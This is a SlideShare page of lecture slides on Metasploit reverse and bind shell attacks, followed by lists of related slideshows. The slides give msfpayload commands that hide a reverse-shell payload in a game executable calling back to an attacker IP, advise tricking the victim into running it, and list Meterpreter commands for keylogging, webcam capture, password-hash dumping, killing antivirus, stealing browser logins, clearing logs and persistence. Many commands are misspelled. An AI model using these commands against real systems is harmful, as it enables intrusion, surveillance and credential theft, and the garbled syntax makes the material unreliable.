SlideShare a Scribd company logo

Cyber Security and Ethical hacking 16

Mehedi Hasan
Mehedi Hasan

Cyber Security and Ethical hacking with real life example.

Technology
1 of 51
Cyber Security & Ethical Hacking By Mehedi Hasan Lecture 16: Reverse & Bind Shell Attacks
Meterpreter Exploit: Exploit is the process of taking advantage of security loophole on the victim’s computer to gain illegal access. Payloads: Payload is the code that an attacker executes on the victims computer once the system has been compromised. Reverse Shell payload is an example. Post Explanation Attack: Once a system has been compromised the attacker executed against it to control. Listener: Listener is code that runs on the attackers computer & wait for an incoming connection from victims computer. Poet Explanation Attacks Important Terminology
Shell A shell is a command line interface on a systemm that allows user to interface with the system by sending it text commands. For example. Command line prompt in windows and Terminal in Kali Linux.
Reverse Shell Attack Reverse Shell attacks are attacks that force the victims computer to connect back to the criminal and provide the criminal with remote shell access to it. Reverse shell attacks also have the additional advantage that they allow the criminal to connect to the victim, even if the victim is behind a firewall or has an internal IP address. This is true since in case of a remote shell attack it is an outgoing connection instead of an incoming connection. Typically in a reverse shell attach, the criminal has to follow below steps. Step 1: Infect a regular file with a payload (msf) Step 2: Open a port on criminals computer and listen for any incoming connections from the victim (msf) Step 3: Send the infected file to the victim and somehow get them executed file (Social Engineering)
Meterpreter • Introductions: Meterpreter is a tool which is a part of Metasploit and allows the attacker to communicate with the victims system after it has been exploited. The best part about meterpreter is that it will run from the memory by attaching itself to a process on the victims computer and does not create any file on it. Post Explanation Attacks
Merterpreter Reverse Shell Access: Steps Involved Step 1: Backdoor file Backdoor a file and infect with exploit code and payload. (exe, pdf, doc, xls) Step 2: listener Launce listener on your computer. Step 3: Explanation Send infected file to victim and somehow make execute. Step 4: Shell Access Wait for remote shell connection to get established between victim and attacker. Step 4: Post Explanation Control the victims computer with post explanation script
Merterpreter Post Explanation Attacks Step 1: Backdoor file (msf) msfpayload windows/meterpreter/reverse_tec LHOST=192.168.100.15, LPORT=4444 >/root/desktop/nfs.exe Step 2: Listener use exploit/multi/handler set payload windows/meterpreter/revers_tcp set LHOST=192.168.100.15 exploit Step 3: Explanation (Social Engineering) Step 4: Shell Access Get meterepreter shell access Step 5: Post Explanation.
Merterpreter Post Explanation Attacks Different ways to get a Meterepreter Session • Send to victim the infected file. • Send to victim the infected PDF/Vulnerability in adobe acrobat on victim • Send a link to victim of a page that exploits a browser Vulnerability. • Send a link to victim of a webpage that exploit a JAVA Vulnerability
Remote Shell Attack Using an infected exe file Require Techniques • Victim is running windows 7 • Attacker has metasplait.
Merterpreter Post Explanation Attacks Step 1: Hide the reverse shell payload onto say a game like NFS.exe. This reveres shell payload when executed on the victims system will connect back to the attacker on port 4444 on the IP address 192.168.100.15 Msfpaylaod windows/mereterpreter/reverce_tcp LHOST=192.168.100.15, LPORT=4444, >root/desktop/nfs.exe Step 2: Start metasploit and type the following commands to launch the multi handeler module and tell it which payload to expect and on what port. Use exploit/multi/handeler/reverse_tcp set lhost192.168.100.15 Step 3: Metasploit will now start the payload handler, wait for a Reverse shell connection to get established from the victims machine to the attackers on port 4444
Merterpreter Post Explanation Attacks Step 4: Somehow send the nfs.exe file to the victim and fool the victim into executing it on the windows 7 system. Step5: you have now successfully managed to connect to The victims computer and a meterpreter session has been Created between attacker and the victim. To double check, type the sysinfo command. Step 6: To get access to the shell prompt on the victims computer, simply type the shell command: shell Step 7: You can now browse the victims computer just as if it were your own computer.
Post Exploitation Scripts List of existing scripts available http://dev.metasploit.com/redmine/projects/fr amework/repository/shell-script/metrepreter
Meterpreter existing script cd/pentest/exploits/framework/script/meterepeter# dir
Meterpreter existing script Display interface information of victims computes ipconfig
Meterpreter existing script Display system information of victims computes sysinfo
Meterpreter existing script Take a picture using the victims webcam wemcam_list
Meterpreter existing script Take a Screenshot of the victims webcam Screenshot
Meterpreter existing script Displays list of processes running on victims computer. ps
Meterpreter existing script Migrating to some other process: migrate 912 Migrates to the process whose process is 912 in this case explore.exe. Now toy can capture victims keystroke.
Meterpreter existing script Start a keylogger on the victims computer Run post/windows/capture/keylog_recorder Starts kelogger on victims system and records all keystrokes
Meterpreter existing script Start a Key logger on the victims computer. Keyscan_start Keyscan_dump Keyscan_stop Starts Keylogger on victims computer, Dumps key logger Buffer and then stop key logger
Meterpreter existing script Shuts Down or Reboot the victims computers Shutdown Reboots
Meterpreter existing script Kill the antivirus of victims computer Run killav
Meterpreter existing script Privilege escalation on the victims system Getsystem Tries previlege escalation to give you admin rights on victim system. getuid Tells you which user you are currently logged in as on victim system.
Meterpreter existing script Remotely modify the victims registry . reg
Meterpreter existing script Dump the password hashes. run hasdump
Meterpreter existing script Steal Password Hashes. Getsystem, run hashdump
Meterpreter existing script Take over the victims computer. Run scraper Allows you to download all sorts of information from the victim computer.
Meterpreter existing script Interactive remote GUI access to victim. Run vnc
Meterpreter existing script Control Mouse/Keyboard of victim. Uictl –h, Uictl disable mouse, Uictl enable mouse.
Meterpreter existing script Erase log file of victim. clearev
Meterpreter existing script Erase log file of victim. Run event_manager -h
Meterpreter existing script Post explanation modules
Meterpreter existing script View list of wi-fi networks. Run post/windows/wlan/wlan_bss_list
Meterpreter existing script Get all stored wi-fi profile. Run post/windows/wlan/wlan_profile
Meterpreter existing script View usb history of victim. Run post/windows/gather/usb_history
Meterpreter existing script Get Shortcuts from victim. . Run post/windows/gather/dumplinks
Meterpreter existing script Stel saved picasa password. Run post/windows/gather/credentials/enum_picasa_pwda
Meterpreter existing script Steal browser history, cookies, logindata, bookmarks & preferences Run post/windows/gather/enum_chrome
Meterpreter existing script Steal microsoft product keys of victim. Run post/windows/gather/enum_ms_product_keys
Remote Shell Attack Once you have successfully got shell access to the victims computer, ideally you want to leave a backdoor open if. Such that you will have easy access to it in the future as well. Meterpreter has a persistance.rb script that launches a meterpreter Service on the victims computer, such that the attacker will be able to access the victims computer even after it has been rebooted. Once you have meterepreter shell access on victim, just type the below Commands. Persistance –h Display all the various option avaiable. Persistance –u –i5 –p 443 –r 192.168.100.1 Now even when the victim shuts down the computer whenever the victim on again then you will have meterpreter shell access to the victim
Bind Shell Attack
Bind Shell VS Reverse Shell Bind Shell Reveres Shell It is possible to bind an application to a particular port in such a way that whenever a user connects to that port then the user gets shell access to the victim It is possible to create a payload in such a way that, when executed on the victim, it will connect to the attacker and give shell access. Attacker has to connect to the victim on the specified port to get access to the shell. Victim connects back to the attacker giving the attacker a reverse shell code. Easy to detect by firewall. Difficult to detect by firewall.
Merterpreter Reverse Shell Access: Steps Involved Step 1: Backdoor file Backdoor a file and infect with exploit code and payload. (exe, pdf, doc, xls) Step 2: listener Launce listener on your computer. Step 3: Explanation Send infected file to victim and somehow make execute. Step 4: Shell Access Wait for remote shell connection to get established between victim and attacker. Step 4: Post Explanation Control the victims computer with post explanation script
Merterpreter Bind Shell Access: Steps Involved Step 1: Backdoor file Backdoor a file and infected with exploit code and payload. (exe, pdf, doc, xls) Step 2: Explanation Send infected file to victim and somehow make execute. Step 3: listener Exploit binds itself to a particular port on the victim and listens for a connection from the attacker. Step 4: Shell Access Attacker connect to the victim on the exploited port. Step 5: Post Explanation Control the victims computer with post explanation script and commands.
MSFPAYLOAD Msfpayload –l Display a list of payloads that are possible to bacdoor
MSFPAYLOAD Possible to create payloads for both reverse & bind shell attacks
Backdooring an EXE file with a payload It is possible to backdoor an EXE file with a payload (reverse or bind shell) with the help of mafpayloads Msfpayload <payload> <LHOST=> <LPORT=> x –o <output file name> For example: Msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.12 LPORT=4444 X>/root/desktop/NFS.exe
Create Bind Shell Msfpayload windows/meterpreter/bind_tcp LHOST=192.168.100.13 LPORT=666 X>/root/desktop/bind.exe
Meterpreter existing script Get Shortcuts from victim. . Run post/windows/gather/dumplinks
Thanks You

Recommended

Cyber security and ethical hacking 9
Cyber security and ethical hacking 9Cyber security and ethical hacking 9
Cyber security and ethical hacking 9Mehedi Hasan
 
Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Mehedi Hasan
 
Cyber security &amp; ethical hacking 10
Cyber security &amp; ethical hacking 10Cyber security &amp; ethical hacking 10
Cyber security &amp; ethical hacking 10Mehedi Hasan
 
Portable tool for digital forensic (ptdf v1.0)
Portable tool for digital forensic (ptdf v1.0)Portable tool for digital forensic (ptdf v1.0)
Portable tool for digital forensic (ptdf v1.0)Mehedi Hasan
 
Digital forensics research: The next 10 years
Digital forensics research: The next 10 yearsDigital forensics research: The next 10 years
Digital forensics research: The next 10 yearsMehedi Hasan
 
Cyber security and ethical hacking 7
Cyber security and ethical hacking 7Cyber security and ethical hacking 7
Cyber security and ethical hacking 7Mehedi Hasan
 
Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 

Recommended

Cyber security and ethical hacking 9
Cyber security and ethical hacking 9Cyber security and ethical hacking 9
Cyber security and ethical hacking 9Mehedi Hasan
 
Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Mehedi Hasan
 
Cyber security &amp; ethical hacking 10
Cyber security &amp; ethical hacking 10Cyber security &amp; ethical hacking 10
Cyber security &amp; ethical hacking 10Mehedi Hasan
 
Portable tool for digital forensic (ptdf v1.0)
Portable tool for digital forensic (ptdf v1.0)Portable tool for digital forensic (ptdf v1.0)
Portable tool for digital forensic (ptdf v1.0)Mehedi Hasan
 
Digital forensics research: The next 10 years
Digital forensics research: The next 10 yearsDigital forensics research: The next 10 years
Digital forensics research: The next 10 yearsMehedi Hasan
 
Cyber security and ethical hacking 7
Cyber security and ethical hacking 7Cyber security and ethical hacking 7
Cyber security and ethical hacking 7Mehedi Hasan
 
Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Ch02 System Threats and Risks
Ch02 System Threats and RisksCh02 System Threats and Risks
Ch02 System Threats and RisksInformation Technology
 
Chapter 2 Presentation
Chapter 2 PresentationChapter 2 Presentation
Chapter 2 PresentationAmy McMullin
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewallamiable_indian
 
Introduction to OpenCV 3.x (with Java)
Introduction to OpenCV 3.x (with Java)Introduction to OpenCV 3.x (with Java)
Introduction to OpenCV 3.x (with Java)Luigi De Russis
 
Brisk_Sample_Website_Pentest_Report
Brisk_Sample_Website_Pentest_ReportBrisk_Sample_Website_Pentest_Report
Brisk_Sample_Website_Pentest_ReportBriskInfosec Solutions
 
Ariu - Workshop on Multiple Classifier Systems - 2011
Ariu - Workshop on Multiple Classifier Systems - 2011Ariu - Workshop on Multiple Classifier Systems - 2011
Ariu - Workshop on Multiple Classifier Systems - 2011Pluribus One
 
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...Area41
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Infrastructure Attacks - The Next generation, ESET LLC
Infrastructure Attacks - The Next generation, ESET LLCInfrastructure Attacks - The Next generation, ESET LLC
Infrastructure Attacks - The Next generation, ESET LLCInfosec Europe
 
Access control attacks by nor liyana binti azman
Access control attacks by nor liyana binti azmanAccess control attacks by nor liyana binti azman
Access control attacks by nor liyana binti azmanHafiza Abas
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentationmichelemanzotti
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14mjos
 
Web Security
Web SecurityWeb Security
Web SecurityRam Dutt Shukla
 
Stagefright (1)
Stagefright (1)Stagefright (1)
Stagefright (1)Mamoon Ismail Khalid
 
Network and Internet Security.docx
Network and Internet Security.docxNetwork and Internet Security.docx
Network and Internet Security.docxstirlingvwriters
 
Ransomware for fun and non-profit
Ransomware for fun and non-profitRansomware for fun and non-profit
Ransomware for fun and non-profitYouness Zougar
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)Wail Hassan
 

More Related Content

Viewers also liked

Chapter 2 Presentation
Chapter 2 PresentationChapter 2 Presentation
Chapter 2 PresentationAmy McMullin
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewallamiable_indian
 
Introduction to OpenCV 3.x (with Java)
Introduction to OpenCV 3.x (with Java)Introduction to OpenCV 3.x (with Java)
Introduction to OpenCV 3.x (with Java)Luigi De Russis
 
Ariu - Workshop on Multiple Classifier Systems - 2011
Ariu - Workshop on Multiple Classifier Systems - 2011Ariu - Workshop on Multiple Classifier Systems - 2011
Ariu - Workshop on Multiple Classifier Systems - 2011Pluribus One
 
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...Area41
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Infrastructure Attacks - The Next generation, ESET LLC
Infrastructure Attacks - The Next generation, ESET LLCInfrastructure Attacks - The Next generation, ESET LLC
Infrastructure Attacks - The Next generation, ESET LLCInfosec Europe
 
Access control attacks by nor liyana binti azman
Access control attacks by nor liyana binti azmanAccess control attacks by nor liyana binti azman
Access control attacks by nor liyana binti azmanHafiza Abas
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentationmichelemanzotti
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14mjos
 

Viewers also liked (13)

Ch02 System Threats and Risks
Ch02 System Threats and RisksCh02 System Threats and Risks
Ch02 System Threats and Risks
 
Chapter 2 Presentation
Chapter 2 PresentationChapter 2 Presentation
Chapter 2 Presentation
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
 
Introduction to OpenCV 3.x (with Java)
Introduction to OpenCV 3.x (with Java)Introduction to OpenCV 3.x (with Java)
Introduction to OpenCV 3.x (with Java)
 
Brisk_Sample_Website_Pentest_Report
Brisk_Sample_Website_Pentest_ReportBrisk_Sample_Website_Pentest_Report
Brisk_Sample_Website_Pentest_Report
 
Ariu - Workshop on Multiple Classifier Systems - 2011
Ariu - Workshop on Multiple Classifier Systems - 2011Ariu - Workshop on Multiple Classifier Systems - 2011
Ariu - Workshop on Multiple Classifier Systems - 2011
 
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
hashdays 2011: Felix 'FX' Lindner - Targeted Industrial Control System Attack...
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
 
Infrastructure Attacks - The Next generation, ESET LLC
Infrastructure Attacks - The Next generation, ESET LLCInfrastructure Attacks - The Next generation, ESET LLC
Infrastructure Attacks - The Next generation, ESET LLC
 
Access control attacks by nor liyana binti azman
Access control attacks by nor liyana binti azmanAccess control attacks by nor liyana binti azman
Access control attacks by nor liyana binti azman
 
Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentation
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14
 
Web Security
Web SecurityWeb Security
Web Security
 

Similar to Cyber Security and Ethical hacking 16

Network and Internet Security.docx
Network and Internet Security.docxNetwork and Internet Security.docx
Network and Internet Security.docxstirlingvwriters
 
Ransomware for fun and non-profit
Ransomware for fun and non-profitRansomware for fun and non-profit
Ransomware for fun and non-profitYouness Zougar
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)Wail Hassan
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Spreading Technique used by Malware
Spreading Technique used by MalwareSpreading Technique used by Malware
Spreading Technique used by MalwareAbhishek Singh
 
Final Project _Smart Utilities
Final Project _Smart UtilitiesFinal Project _Smart Utilities
Final Project _Smart UtilitiesPasan Alagiyawanna
 
Security and ethics
Security and ethicsSecurity and ethics
Security and ethicsArgie242424
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9koolkampus
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 

Similar to Cyber Security and Ethical hacking 16 (20)

Stagefright (1)
Stagefright (1)Stagefright (1)
Stagefright (1)
 
Network and Internet Security.docx
Network and Internet Security.docxNetwork and Internet Security.docx
Network and Internet Security.docx
 
Ransomware for fun and non-profit
Ransomware for fun and non-profitRansomware for fun and non-profit
Ransomware for fun and non-profit
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Aw36294299
Aw36294299Aw36294299
Aw36294299
 
UNIX.ppt
UNIX.pptUNIX.ppt
UNIX.ppt
 
Spreading Technique used by Malware
Spreading Technique used by MalwareSpreading Technique used by Malware
Spreading Technique used by Malware
 
Final Project _Smart Utilities
Final Project _Smart UtilitiesFinal Project _Smart Utilities
Final Project _Smart Utilities
 
Security and ethics
Security and ethicsSecurity and ethics
Security and ethics
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9Intruders and Viruses in Network Security NS9
Intruders and Viruses in Network Security NS9
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 

More from Mehedi Hasan

Company profile logikeye.pdf
Company profile logikeye.pdfCompany profile logikeye.pdf
Company profile logikeye.pdfMehedi Hasan
 
Cyber security and Ethical Hacking flyer.pdf
Cyber security and Ethical Hacking flyer.pdfCyber security and Ethical Hacking flyer.pdf
Cyber security and Ethical Hacking flyer.pdfMehedi Hasan
 
Hackng CPU Code through Security Fuse.pptx
Hackng CPU Code through Security Fuse.pptxHackng CPU Code through Security Fuse.pptx
Hackng CPU Code through Security Fuse.pptxMehedi Hasan
 
Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...
Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...
Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...Mehedi Hasan
 
Cyber security and Ethical Hacking Course.pdf
Cyber security and Ethical Hacking Course.pdfCyber security and Ethical Hacking Course.pdf
Cyber security and Ethical Hacking Course.pdfMehedi Hasan
 
CYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdf
CYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdfCYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdf
CYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdfMehedi Hasan
 
Wall Listening Devices.pdf
Wall Listening Devices.pdfWall Listening Devices.pdf
Wall Listening Devices.pdfMehedi Hasan
 
Syllabus for Cyber security and Ethical Hacking
Syllabus for Cyber security and Ethical HackingSyllabus for Cyber security and Ethical Hacking
Syllabus for Cyber security and Ethical HackingMehedi Hasan
 
Smart voice security system
Smart voice security systemSmart voice security system
Smart voice security systemMehedi Hasan
 
ONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICES
ONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICESONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICES
ONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICESMehedi Hasan
 
Nuclear Powered Drones A Threat to Biodiversity.docx
Nuclear Powered Drones A Threat to Biodiversity.docxNuclear Powered Drones A Threat to Biodiversity.docx
Nuclear Powered Drones A Threat to Biodiversity.docxMehedi Hasan
 
Information Leakage The Impact on Smart Bangladesh Vision 2041.pptx
Information Leakage The Impact on Smart Bangladesh Vision 2041.pptxInformation Leakage The Impact on Smart Bangladesh Vision 2041.pptx
Information Leakage The Impact on Smart Bangladesh Vision 2041.pptxMehedi Hasan
 
Cyber Crime Awareness.pptx
Cyber Crime Awareness.pptxCyber Crime Awareness.pptx
Cyber Crime Awareness.pptxMehedi Hasan
 
UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...
UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...
UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...Mehedi Hasan
 
The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...
The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...
The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...Mehedi Hasan
 
Cyber crime and investigation training
Cyber crime and investigation trainingCyber crime and investigation training
Cyber crime and investigation trainingMehedi Hasan
 
সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ
সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ
সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ Mehedi Hasan
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigationMehedi Hasan
 
Remote control system (rcs)
Remote control system (rcs)Remote control system (rcs)
Remote control system (rcs)Mehedi Hasan
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensicsMehedi Hasan
 

More from Mehedi Hasan (20)

Company profile logikeye.pdf
Company profile logikeye.pdfCompany profile logikeye.pdf
Company profile logikeye.pdf
 
Cyber security and Ethical Hacking flyer.pdf
Cyber security and Ethical Hacking flyer.pdfCyber security and Ethical Hacking flyer.pdf
Cyber security and Ethical Hacking flyer.pdf
 
Hackng CPU Code through Security Fuse.pptx
Hackng CPU Code through Security Fuse.pptxHackng CPU Code through Security Fuse.pptx
Hackng CPU Code through Security Fuse.pptx
 
Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...
Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...
Unlocking the Secrets Revolutionizing Rom Cloning Technology with a Creative ...
 
Cyber security and Ethical Hacking Course.pdf
Cyber security and Ethical Hacking Course.pdfCyber security and Ethical Hacking Course.pdf
Cyber security and Ethical Hacking Course.pdf
 
CYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdf
CYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdfCYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdf
CYBER ATTACKS ON INDUSTRIAL AUTOMATION.pdf
 
Wall Listening Devices.pdf
Wall Listening Devices.pdfWall Listening Devices.pdf
Wall Listening Devices.pdf
 
Syllabus for Cyber security and Ethical Hacking
Syllabus for Cyber security and Ethical HackingSyllabus for Cyber security and Ethical Hacking
Syllabus for Cyber security and Ethical Hacking
 
Smart voice security system
Smart voice security systemSmart voice security system
Smart voice security system
 
ONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICES
ONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICESONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICES
ONLINE SEFTY AND AWARNESS OF OPERATION AND SECURITY OF DIGITAL DEVICES
 
Nuclear Powered Drones A Threat to Biodiversity.docx
Nuclear Powered Drones A Threat to Biodiversity.docxNuclear Powered Drones A Threat to Biodiversity.docx
Nuclear Powered Drones A Threat to Biodiversity.docx
 
Information Leakage The Impact on Smart Bangladesh Vision 2041.pptx
Information Leakage The Impact on Smart Bangladesh Vision 2041.pptxInformation Leakage The Impact on Smart Bangladesh Vision 2041.pptx
Information Leakage The Impact on Smart Bangladesh Vision 2041.pptx
 
Cyber Crime Awareness.pptx
Cyber Crime Awareness.pptxCyber Crime Awareness.pptx
Cyber Crime Awareness.pptx
 
UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...
UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...
UNVEILING THE DAR SIDE EXPLORING THE DEVASTATING CONSEQUENCES OF FINANCIAL FR...
 
The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...
The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...
The Digital Dilemma Unveiling the Impact of Social Media and the Menace of Cy...
 
Cyber crime and investigation training
Cyber crime and investigation trainingCyber crime and investigation training
Cyber crime and investigation training
 
সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ
